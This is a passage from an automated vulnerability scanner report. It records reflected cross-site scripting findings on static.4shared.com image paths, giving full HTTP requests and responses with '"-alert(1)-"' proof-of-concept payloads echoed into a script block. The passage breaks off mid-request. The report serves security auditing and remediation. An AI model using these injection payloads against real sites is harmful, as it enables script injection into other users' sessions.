Date: Wed, 23 Feb 2011 21:49:23 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/all1.png6d50a"-alert(1)-"fe06872aee9";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.248. http://static.4shared.com/images/bg14.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12272"-alert(1)-"abf7e4d3c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images12272"-alert(1)-"abf7e4d3c4/bg14.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images12272&quot;-alert(1)-&quot;abf7e4d3c4/bg14.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=43D79AA9EFAA9A673546765B9249A7AC.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:38 GMT
Content-Length: 36173


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images12272"-alert(1)-"abf7e4d3c4/bg14.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.249. http://static.4shared.com/images/bg14.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/bg14.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 69174"-alert(1)-"fe2d06cbac0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/bg14.png69174"-alert(1)-"fe2d06cbac0 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/bg14.png69174&quot;-alert(1)-&quot;fe2d06cbac0
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B7E590F3655F47E51A63A0676D1F9F48.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:43 GMT
Content-Length: 36189


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/bg14.png69174"-alert(1)-"fe2d06cbac0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.250. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7a64c"-alert(1)-"ffcb7e388af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images7a64c&quot;-alert(1)-&quot;ffcb7e388af/facebook/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=5B2A45DC50C460E287C02F9C2D8C0CA2.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images7a64c"-alert(1)-"ffcb7e388af/facebook/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function f
...[SNIP]...

1.251. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7d708"-alert(1)-"02fd9aad990 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook7d708&quot;-alert(1)-&quot;02fd9aad990/login-button.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=28CE1CB951BF35E4F350801829B3A789.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:21 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook7d708"-alert(1)-"02fd9aad990/login-button.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.252. http://static.4shared.com/images/facebook/login-button.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/facebook/login-button.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e9ec6"-alert(1)-"d0a9f28947d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/facebook/login-button.pnge9ec6&quot;-alert(1)-&quot;d0a9f28947d
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E747ED2ED4DEE1341BDB3FC96D31DF00.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:27 GMT
Content-Length: 36274


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/facebook/login-button.pnge9ec6"-alert(1)-"d0a9f28947d";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.253. http://static.4shared.com/images/googleW.png [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 393fb"-alert(1)-"ee3174caf07 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images393fb"-alert(1)-"ee3174caf07/googleW.png HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images393fb&quot;-alert(1)-&quot;ee3174caf07/googleW.png
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=532AA185B4FE1F95997702082EEC4FD9.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:10 GMT
Content-Length: 36193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images393fb"-alert(1)-"ee3174caf07/googleW.png";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.254. http://static.4shared.com/images/googleW.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/googleW.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f6f"-alert(1)-"4a01f65d839 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/googleW.png41f6f"-alert(1)-"4a01f65d839 HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/googleW.png41f6f&quot;-alert(1)-&quot;4a01f65d839
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=019E23D2EE91E7EDD888FD32E0B169F3.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:15 GMT
Content-Length: 36204


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/googleW.png41f6f"-alert(1)-"4a01f65d839";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.255. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 44c1c"-alert(1)-"a0a1c09ce47 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images44c1c&quot;-alert(1)-&quot;a0a1c09ce47/icons/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6F1B92C331007CBC25069E048B75DF96.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:20 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images44c1c"-alert(1)-"a0a1c09ce47/icons/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedb
...[SNIP]...

1.256. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db94"-alert(1)-"6dac60dedfd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons9db94&quot;-alert(1)-&quot;6dac60dedfd/16x16/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=12E25BC3F676E23105B6E28B2550FFC7.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:26 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons9db94"-alert(1)-"6dac60dedfd/16x16/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback()
...[SNIP]...

1.257. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f7aec"-alert(1)-"b86c9662edb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16f7aec&quot;-alert(1)-&quot;b86c9662edb/close.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EEF65510DB407ACEDFB8FAF9B72454E4.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:31 GMT
Content-Length: 36243


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16f7aec"-alert(1)-"b86c9662edb/close.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

1.258. http://static.4shared.com/images/icons/16x16/close.gif [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/close.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ad02c"-alert(1)-"a953950d00e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images/icons/16x16/close.gifad02c&quot;-alert(1)-&quot;a953950d00e
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=03A457731FAEC3860D53C42B8811E941.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:37 GMT
Content-Length: 36254


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images/icons/16x16/close.gifad02c"-alert(1)-"a953950d00e";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

1.259. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 760a5"-alert(1)-"158d4163382 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hostid=220011363; __utmz=210074320.1297862350.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=210074320.1172937508.1297862350.1297862350.1297862350.1; __qca=P0-1133200866-1297862349616; df=""; afu=""; afp=""; adu=""; adp=""; ausk=""; dirPwdVerified=""

Response

HTTP/1.1 404 /images760a5&quot;-alert(1)-&quot;158d4163382/icons/16x16/stop.gif
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D6DADEDB0265DD419843A49CE2D04781.dc292; Path=/
Content-Type: text/html;charset=UTF-8
Date: Wed, 23 Feb 2011 21:49:11 GMT
Content-Length: 36249


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/-->

...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://static.4shared.com/images760a5"-alert(1)-"158d4163382/icons/16x16/stop.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedba
...[SNIP]...

1.260. http://static.4shared.com/images/icons/16x16/stop.gif [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.4shared.com
Path:   /images/icons/16x16/stop.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73080"-alert(1)-"bd5e5c0b567 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/icons73080"-alert(1)-"bd5e5c0b567/16x16/stop.gif HTTP/1.1
Host: static.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
